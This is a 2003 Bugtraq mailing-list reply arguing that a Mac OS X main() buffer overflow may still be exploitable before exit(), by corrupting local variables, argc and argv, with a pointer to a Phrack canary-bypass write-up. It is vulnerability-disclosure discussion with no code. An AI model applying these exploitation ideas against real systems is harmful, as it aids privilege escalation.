Bugtraq mailing list archives
Re: Buffer overflow/privilege escalation in MacOS X
From: Mariusz Woloszyn <emsi () ipartners pl>
Date: Tue, 16 Dec 2003 19:15:13 +0100 (CET)
On Mon, 15 Dec 2003, Dave G. wrote:
Indeed. However, due to several mitigating factors, this issue doe not appear to be exploitable (at least not with any of the techniques I am aware of). The overflow occurs in main() and there is an unavoidable exit() at the end of the function. So while you can overwrite the return stack frame, the process will never use your new value.
But you overflow local varialbles, argc and argv**, so if the program ever uses it after the overflow, it might be possible to expoit it, _before_ exit(). See: http://www.phrack.org/show.php?p=56&a=5, at the end of "Oily way" part. We explained there how to exploit a code protected with a compiler placing a canary word before the RET. Of course a couple of conditions must be fulfilled. Regards, -- Mariusz Wołoszyn Internet Security Specialist, GTS - Internet Partners
Current thread:
- Buffer overflow/privilege escalation in MacOS X Max (Dec 15)
- Re: Buffer overflow/privilege escalation in MacOS X David Riley (Dec 18)
- <Possible follow-ups>
- Re: Buffer overflow/privilege escalation in MacOS X Dave G . (Dec 16)
- Re: Buffer overflow/privilege escalation in MacOS X Seth Arnold (Dec 16)
- Re: Buffer overflow/privilege escalation in MacOS X Mariusz Woloszyn (Dec 16)
- Re: Buffer overflow/privilege escalation in MacOS X Max (Dec 16)